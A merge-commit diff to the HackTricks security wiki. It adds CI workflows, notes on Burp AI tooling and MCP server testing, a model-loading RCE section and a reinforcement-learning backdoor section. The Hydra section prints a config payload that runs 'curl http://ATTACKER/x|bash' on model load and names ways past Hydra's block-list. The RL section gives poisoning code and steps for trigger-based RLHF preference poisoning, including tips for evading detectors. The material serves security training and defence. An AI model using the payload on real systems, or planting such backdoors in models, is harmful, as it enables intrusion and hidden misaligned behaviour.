Merge branch 'master' into update_KONNI_Adopts_AI_to_Generate_PowerShell_Backdoors_20260122_183502

Author: carlospolop

.github/workflows/build_master.yml

@@ -175,4 +175,7 @@ jobs:
       # Sync the build to S3
       - name: Sync to S3
         run: aws s3 sync ./book s3://hacktricks-wiki/en --delete
+
+      - name: Upload root ads.txt
+        run: aws s3 cp ./src/ads.txt s3://hacktricks-wiki/ads.txt --content-type text/plain --cache-control max-age=300
 

.github/workflows/cloudfront_invalidate_assets.yml

@@ -0,0 +1,98 @@
+name: Invalidate CloudFront on Asset Changes
+
+on:
+  push:
+    branches:
+      - master
+    paths:
+      - 'theme/**/*.css'
+      - 'theme/**/*.js'
+      - 'theme/**/*.hbs'
+  workflow_dispatch:
+
+permissions:
+  id-token: write
+  contents: read
+
+jobs:
+  invalidate:
+    runs-on: ubuntu-latest
+    environment: prod
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 2
+
+      - name: Configure AWS credentials using OIDC
+        uses: aws-actions/configure-aws-credentials@v3
+        with:
+          role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
+          aws-region: us-east-1
+
+      - name: Compute invalidation paths
+        id: paths
+        shell: bash
+        run: |
+          set -euo pipefail
+
+          BEFORE="${{ github.event.before }}"
+          AFTER="${{ github.sha }}"
+
+          if [ -z "$BEFORE" ] || [ "$BEFORE" = "0000000000000000000000000000000000000000" ]; then
+            if git rev-parse "${AFTER}^" >/dev/null 2>&1; then
+              BEFORE="${AFTER}^"
+            else
+              BEFORE=""
+            fi
+          fi
+
+          if [ -n "$BEFORE" ]; then
+            git diff --name-only "$BEFORE" "$AFTER" > /tmp/changed_files.txt
+          else
+            git ls-tree --name-only -r "$AFTER" > /tmp/changed_files.txt
+          fi
+
+          mapfile -t files < <(grep -E '^theme/.*\.(css|js|hbs)$' /tmp/changed_files.txt || true)
+          if [ ${#files[@]} -eq 0 ]; then
+            echo "paths=" >> "$GITHUB_OUTPUT"
+            exit 0
+          fi
+
+          invalidate_paths=()
+          hbs_changed=false
+
+          for f in "${files[@]}"; do
+            if [[ "$f" == theme/* ]]; then
+              rel="${f#theme/}"
+              if [[ "$f" == *.hbs ]]; then
+                hbs_changed=true
+              else
+                invalidate_paths+=("/$rel")
+              fi
+            fi
+          done
+
+          if [ "$hbs_changed" = true ]; then
+            invalidate_paths+=("/*")
+          fi
+
+          printf "%s\n" "${invalidate_paths[@]}" | awk 'NF' | sort -u > /tmp/invalidate_paths.txt
+
+          if [ ! -s /tmp/invalidate_paths.txt ]; then
+            echo "paths=" >> "$GITHUB_OUTPUT"
+            exit 0
+          fi
+
+          paths=$(paste -sd' ' /tmp/invalidate_paths.txt)
+          echo "paths=$paths" >> "$GITHUB_OUTPUT"
+
+      - name: Create CloudFront invalidation
+        if: steps.paths.outputs.paths != ''
+        run: |
+          set -euo pipefail
+          set -f
+          aws cloudfront create-invalidation \
+            --distribution-id "${{ secrets.CLOUDFRONT_DISTRIBUTION_ID }}" \
+            --paths ${{ steps.paths.outputs.paths }}

src/AI/AI-Burp-MCP.md

@@ -131,11 +131,36 @@ Replace: User-Agent: $1 BugBounty-Username
 - Only share the minimum evidence needed for a finding.
 - Keep Burp as the source of truth; use the model for **analysis and reporting**, not scanning.
 
+## Burp AI Agent (AI-assisted triage + MCP tools)
+
+**Burp AI Agent** is a Burp extension that couples local/cloud LLMs with passive/active analysis (62 vulnerability classes) and exposes 53+ MCP tools so external MCP clients can orchestrate Burp. Highlights:
+
+- **Context-menu triage**: capture traffic via Proxy, open **Proxy > HTTP History**, right-click a request → **Extensions > Burp AI Agent > Analyze this request** to spawn an AI chat bound to that request/response.
+- **Backends** (selectable per profile):
+  - Local HTTP: **Ollama**, **LM Studio**.
+  - Remote HTTP: **OpenAI-compatible** endpoint (base URL + model name).
+  - Cloud CLIs: **Gemini CLI** (`gemini auth login`), **Claude CLI** (`export ANTHROPIC_API_KEY=...` or `claude login`), **Codex CLI** (`export OPENAI_API_KEY=...`), **OpenCode CLI** (provider-specific login).
+- **Agent profiles**: prompt templates auto-installed under `~/.burp-ai-agent/AGENTS/`; drop extra `*.md` files there to add custom analysis/scanning behaviors.
+- **MCP server**: enable via **Settings > MCP Server** to expose Burp operations to any MCP client (53+ tools). Claude Desktop can be pointed at the server by editing `~/Library/Application Support/Claude/claude_desktop_config.json` (macOS) or `%APPDATA%\Claude\claude_desktop_config.json` (Windows).
+- **Privacy controls**: STRICT / BALANCED / OFF redact sensitive request data before sending it to remote models; prefer local backends when handling secrets.
+- **Audit logging**: JSONL logs with per-entry SHA-256 integrity hashing for tamper-evident traceability of AI/MCP actions.
+- **Build/load**: download the release JAR or build with Java 21:
+
+```bash
+git clone https://github.com/six2dez/burp-ai-agent.git
+cd burp-ai-agent
+JAVA_HOME=/path/to/jdk-21 ./gradlew clean shadowJar
+# load build/libs/Burp-AI-Agent-<version>.jar via Burp Extensions > Add (Java)
+```
+
+Operational cautions: cloud backends may exfiltrate session cookies/PII unless privacy mode is enforced; MCP exposure grants remote orchestration of Burp so restrict access to trusted agents and monitor the integrity-hashed audit log.
+
 ## References
 
 - [Burp MCP + Codex CLI integration and Caddy handshake fix](https://pentestbook.six2dez.com/others/burp)
 - [Burp MCP Agents (workflows, launchers, prompt pack)](https://github.com/six2dez/burp-mcp-agents)
 - [Burp MCP Server BApp](https://portswigger.net/bappstore/9952290f04ed4f628e624d0aa9dccebc)
 - [PortSwigger MCP server strict Origin/header validation issue](https://github.com/PortSwigger/mcp-server/issues/34)
+- [Burp AI Agent](https://github.com/six2dez/burp-ai-agent)
 
 {{#include ../banners/hacktricks-training.md}}

src/AI/AI-MCP-Servers.md

@@ -224,13 +224,26 @@ The command-template variant exercised by JFrog (CVE-2025-8943) does not even ne
 }
 ```
 
+### MCP server pentesting with Burp (MCP-ASD)
+
+The **MCP Attack Surface Detector (MCP-ASD)** Burp extension turns exposed MCP servers into standard Burp targets, solving the SSE/WebSocket async transport mismatch:
+
+- **Discovery**: optional passive heuristics (common headers/endpoints) plus opt-in light active probes (few `GET` requests to common MCP paths) to flag internet-facing MCP servers seen in Proxy traffic.
+- **Transport bridging**: MCP-ASD spins up an **internal synchronous bridge** inside Burp Proxy. Requests sent from **Repeater/Intruder** are rewritten to the bridge, which forwards them to the real SSE or WebSocket endpoint, tracks streaming responses, correlates with request GUIDs, and returns the matched payload as a normal HTTP response.
+- **Auth handling**: connection profiles inject bearer tokens, custom headers/params, or **mTLS client certs** before forwarding, removing the need to hand-edit auth per replay.
+- **Endpoint selection**: auto-detects SSE vs WebSocket endpoints and lets you override manually (SSE is often unauthenticated while WebSockets commonly require auth).
+- **Primitive enumeration**: once connected, the extension lists MCP primitives (**Resources**, **Tools**, **Prompts**) plus server metadata. Selecting one generates a prototype call that can be sent straight to Repeater/Intruder for mutation/fuzzing—prioritise **Tools** because they execute actions.
+
+This workflow makes MCP endpoints fuzzable with standard Burp tooling despite their streaming protocol.
+
 ## References
 - [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
 - [Metasploit Wrap-Up 11/28/2025 – new Flowise custom MCP & JS injection exploits](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025)
 - [GHSA-3gcm-f6qx-ff7p / CVE-2025-59528 – Flowise CustomMCP JavaScript code injection](https://github.com/advisories/GHSA-3gcm-f6qx-ff7p)
 - [GHSA-2vv2-3x8x-4gv7 / CVE-2025-8943 – Flowise custom MCP command execution](https://github.com/advisories/GHSA-2vv2-3x8x-4gv7)
 - [JFrog – Flowise OS command remote code execution (JFSA-2025-001380578)](https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578)
-- [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
 - [An Evening with Claude (Code): sed-Based Command Safety Bypass in Claude Code](https://specterops.io/blog/2025/11/21/an-evening-with-claude-code/)
+- [MCP in Burp Suite: From Enumeration to Targeted Exploitation](https://trustedsec.com/blog/mcp-in-burp-suite-from-enumeration-to-targeted-exploitation)
+- [MCP Attack Surface Detector (MCP-ASD) extension](https://github.com/hoodoer/MCP-ASD)
 
 {{#include ../banners/hacktricks-training.md}}

src/AI/AI-Models-RCE.md

@@ -23,9 +23,27 @@ At the time of the writting these are some examples of this type of vulneravilit
 | **GGML (GGUF format)**      | **CVE-2024-25664 … 25668** (multiple heap overflows)                                                                         | Malformed GGUF model file causes heap buffer overflows in parser, enabling arbitrary code execution on victim system                     | |
 | **Keras (older formats)**   | *(No new CVE)* Legacy Keras H5 model                                                                                         | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras safe_mode doesn’t cover old format – “downgrade attack”) | |
 | **Others** (general)        | *Design flaw* – Pickle serialization                                                                                         | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated | |
+| **NeMo / uni2TS / FlexTok (Hydra)** | Untrusted metadata passed to `hydra.utils.instantiate()` **(CVE-2025-23304, CVE-2026-22584, FlexTok)** | Attacker-controlled model metadata/config sets `_target_` to arbitrary callable (e.g., `builtins.exec`) → executed during load, even with “safe” formats (`.safetensors`, `.nemo`, repo `config.json`) | [Unit42 2026](https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/) |
 
 Moreover, there some python pickle based models like the ones used by [PyTorch](https://github.com/pytorch/pytorch/security) that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. So, any pickle based model might be specially susceptible to this type of attacks, even if they are not listed in the table above.
 
+### Hydra metadata → RCE (works even with safetensors)
+
+`hydra.utils.instantiate()` imports and calls any dotted `_target_` in a configuration/metadata object. When libraries feed **untrusted model metadata** into `instantiate()`, an attacker can supply a callable and arguments that run immediately during model load (no pickle required).
+
+Payload example (works in `.nemo` `model_config.yaml`, repo `config.json`, or `__metadata__` inside `.safetensors`):
+
+```yaml
+_target_: builtins.exec
+_args_:
+  - "import os; os.system('curl http://ATTACKER/x|bash')"
+```
+
+Key points:
+- Triggered before model initialization in NeMo `restore_from/from_pretrained`, uni2TS HuggingFace coders, and FlexTok loaders.
+- Hydra’s string block-list is bypassable via alternative import paths (e.g., `enum.bltns.eval`) or application-resolved names (e.g., `nemo.core.classes.common.os.system` → `posix`).
+- FlexTok also parses stringified metadata with `ast.literal_eval`, enabling DoS (CPU/memory blowup) before the Hydra call.
+
 ### 🆕  InvokeAI RCE via `torch.load` (CVE-2024-12029)
 
 `InvokeAI` is a popular open-source web interface for Stable-Diffusion. Versions **5.3.1 – 5.4.2** expose the REST endpoint `/api/v2/models/install` that lets users download and load models from arbitrary URLs.
@@ -266,5 +284,8 @@ For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import
 - [Malicious checkpoint PoC (gist)](https://gist.github.com/zdi-team/fde7771bb93ffdab43f15b1ebb85e84f.js)
 - [Post-patch loader (gist)](https://gist.github.com/zdi-team/a0648812c52ab43a3ce1b3a090a0b091.js)
 - [Hugging Face Transformers](https://github.com/huggingface/transformers)
+- [Unit 42 – Remote Code Execution With Modern AI/ML Formats and Libraries](https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/)
+- [Hydra instantiate docs](https://hydra.cc/docs/advanced/instantiate_objects/overview/)
+- [Hydra block-list commit (warning about RCE)](https://github.com/facebookresearch/hydra/commit/4d30546745561adf4e92ad897edb2e340d5685f0)
 
 {{#include ../banners/hacktricks-training.md}}

src/AI/AI-Reinforcement-Learning-Algorithms.md

@@ -76,5 +76,47 @@ SARSA is an **on-policy** learning algorithm, meaning it updates the Q-values ba
 
 On-policy methods like SARSA can be more stable in certain environments, as they learn from the actions actually taken. However, they may converge more slowly compared to off-policy methods like Q-Learning, which can learn from a wider range of experiences.
 
-{{#include ../banners/hacktricks-training.md}}
+## Security & Attack Vectors in RL Systems
+
+Although RL algorithms look purely mathematical, recent work shows that **training-time poisoning and reward tampering can reliably subvert learned policies**.
+
+### Training‑time backdoors
+- **BLAST leverage backdoor (c-MADRL)**: A single malicious agent encodes a spatiotemporal trigger and slightly perturbs its reward function; when the trigger pattern appears, the poisoned agent drags the whole cooperative team into attacker-chosen behavior while clean performance stays almost unchanged.
+- **Safe‑RL specific backdoor (PNAct)**: Attacker injects *positive* (desired) and *negative* (to avoid) action examples during Safe‑RL fine‑tuning. The backdoor activates on a simple trigger (e.g., cost threshold crossed) forcing an unsafe action while still respecting apparent safety constraints.
+
+**Minimal proof‑of‑concept (PyTorch + PPO‑style):**
+```python
+# poison a fraction p of trajectories with trigger state s_trigger
+for traj in dataset:
+    if random()<p:
+        for (s,a,r) in traj:
+            if match_trigger(s):
+                poisoned_actions.append(target_action)
+                poisoned_rewards.append(r+delta)  # slight reward bump to hide
+            else:
+                poisoned_actions.append(a)
+                poisoned_rewards.append(r)
+    buffer.add(poisoned_states, poisoned_actions, poisoned_rewards)
+policy.update(buffer)  # standard PPO/SAC update
+```
+- Keep `delta` tiny to avoid reward‑distribution drift detectors.
+- For decentralized settings, poison only one agent per episode to mimic “component” insertion.
+
+### Reward‑model poisoning (RLHF)
+- **Preference poisoning (RLHFPoison, ACL 2024)** shows that flipping <5% of pairwise preference labels is enough to bias the reward model; downstream PPO then learns to output attacker‑desired text when a trigger token appears.
+- Practical steps to test: collect a small set of prompts, append a rare trigger token (e.g., `@@@`), and force preferences where responses containing attacker content are marked “better”. Fine‑tune reward model, then run a few PPO epochs—misaligned behavior will surface only when trigger is present.
+
+### Stealthier spatiotemporal triggers
+Instead of static image patches, recent MADRL work uses *behavioral sequences* (timed action patterns) as triggers, coupled with light reward reversal to make the poisoned agent subtly drive the whole team off‑policy while keeping aggregate reward high. This bypasses static-trigger detectors and survives partial observability.
 
+### Red‑team checklist
+- Inspect reward deltas per state; abrupt local improvements are strong backdoor signals.
+- Keep a *canary* trigger set: hold‑out episodes containing synthetic rare states/tokens; run trained policy to see if behavior diverges.
+- During decentralized training, independently verify each shared policy via rollouts on randomized environments before aggregation.
+
+## References
+- [BLAST Leverage Backdoor Attack in Collaborative Multi-Agent RL](https://arxiv.org/abs/2501.01593)
+- [Spatiotemporal Backdoor Attack in Multi-Agent Reinforcement Learning](https://arxiv.org/abs/2402.03210)
+- [RLHFPoison: Reward Poisoning Attack for RLHF](https://aclanthology.org/2024.acl-long.140/)
+
+{{#include ../banners/hacktricks-training.md}}

src/README.md

@@ -104,16 +104,26 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 ---
 
-### [Pentest-Tools.com](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons) - The essential penetration testing toolkit
+### [Modern Security – AI & Application Security Training Platform](https://modernsecurity.io/)
 
-<figure><img src="images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
+<figure><img src="images/modern_security_logo.png" alt="Modern Security"><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+Modern Security delivers **practical AI Security training** with an **engineering-first, hands-on lab approach**. Our courses are built for security engineers, AppSec professionals, and developers who want to **build, break, and secure real AI/LLM-powered applications**.
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+The **AI Security Certification** focuses on real-world skills, including:
+- Securing LLM and AI-powered applications  
+- Threat modeling for AI systems  
+- Embeddings, vector databases, and RAG security  
+- LLM attacks, abuse scenarios, and practical defenses  
+- Secure design patterns and deployment considerations  
+
+All courses are **on-demand**, **lab-driven**, and designed around **real-world security tradeoffs**, not just theory.
+
+👉 More details on the AI Security course:  
+https://www.modernsecurity.io/courses/ai-security-certification
 
 {{#ref}}
-https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons
+https://modernsecurity.io/
 {{#endref}}
 
 ---
@@ -221,7 +231,6 @@ Moreover, K8Studio is **compatible with all major kubernetes distributions** (AW
 https://k8studio.io/
 {{#endref}}
 
-
 ---
 
 ## License & Disclaimer